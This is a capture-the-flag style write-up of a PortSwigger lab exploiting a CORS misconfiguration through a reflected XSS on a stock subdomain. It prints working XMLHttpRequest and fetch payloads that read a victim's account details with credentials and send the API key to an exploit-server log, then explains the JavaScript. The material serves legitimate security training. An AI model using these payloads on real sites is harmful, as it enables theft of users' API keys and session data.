PortSwigger Lab: CORS vulnerability with trusted insecure protocols
Task
This website has an insecure CORS configuration in that it trusts all subdomains regardless of the protocol.
To solve the lab, craft some JavaScript that uses CORS to retrieve the administrator’s API key and upload the code to your exploit server. The lab is solved when you successfully submit the administrator’s API key.
You can log in to your own account using the following credentials: wiener:peter
Attempt
First I started inspecting how my (wiener’s) API key was handled.
The response to GET /accountDetails:
HTTP/2 200 OK
Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 149
{
"username": "wiener",
"email": "",
"apikey": "Oz7iaX36fiwX7ukXrR0PbH87FJFOkmRo",
"sessions": [
"ucNlEmPKNjyvuPfnH96vIgJSxj6bN4yl"
]
}
Access-Control-Allow-Credentials is set to true. This could introduce CORS based attacks when Access-Control-Allow-Origin is lax (though Access-Control-Allow-Origin can’t be set to * when Access-Control-Allow-Credentials is set to true).
Directly specify the exploit server as Origin didn’t work as the response didn’t reflect the Access-Control-Allow-Origin header. However, Origin: https://sub.ID.web-security-academy.net/ worked. Now I need access to a subdomain.
This time the check stock feature popped up a different window. Upon inspecting the traffic, I found it opens the subdomain stock.ID.web-security-academy.net. Also the productID parameter was vulnerable to XSS as the error message reflected whatever I input.
Set this payload to the exploit server:
<script>
document.location="http://stock.ID.web-security-academy.net/?productId=1<script>var req = new XMLHttpRequest(); req.onload=reqListener;req.open('get','https://ID.web-security-academy.net/accountDetails',true); req.withCredentials=true;req.send();function reqListener(){location='https://EXPLOIT-ID.exploit-server.net/log?key='%2bthis.responseText; };</script>&storeId=1"
</script>
Delivered the exploit to the victim. Checked the log and got the API key.
Breakdown of the payload
document.location is used to redirect the user to a different page. In this case, it redirects them to http://stock.ID.web-security-academy.net and send the query.
The core js code:
var req = new XMLHttpRequest();
req.onload=reqListener;
req.open('get','https://ID.web-security-academy.net/accountDetails',true); req.withCredentials=true;
req.send();
function reqListener(){
location='https://EXPLOIT-ID.exploit-server.net/log?key='+this.responseText;
};
var req = new XMLHttpRequest(); creates a new instance of an XMLHttpRequest object, which is used to send an HTTP request from the browser to a server.
With req.onload=reqListener;, when the target server responds the reqListener function will be called, so this is a callback function.
req.open initializes a GET request to the URL 'https://ID.web-security-academy.net/accountDetails'. This URL is where the request is being sent to. true indicates asynchronous.
location indicates the current page and when you assign a new url, it will redirect to that page. this is essentially XMLHttpRequest object, and .responseText appends the body of the response to it.
You could use fetch alternative instead of XMLHttpRequest:
fetch('https://ID.web-security-academy.net/accountDetails', {
method: 'GET',
credentials: 'include'
})
.then(response => response.text())
.then(responseText => {
location = 'https://EXPLOIT-ID.exploit-server.net/log?key=' + encodeURIComponent(responseText);
});
This is cleaner but might not work in a legacy system.
They both send a GET request to the target URL (https://ID.web-security-academy.net/accountDetails), capture the response, and then redirect the browser to an exploit server with the response data appended as a query parameter (key=).
Arrow function
response => response.text()
The above code is just syntactic sugar of this one:
function(response) {
return response.text();
}
Hoisting
In javascript, declared functions get hoisted, meaning that they are moved to the top of the scope before the code is executed. So you can use the function before you declare it. However, function expressions aren’t fully hoisted.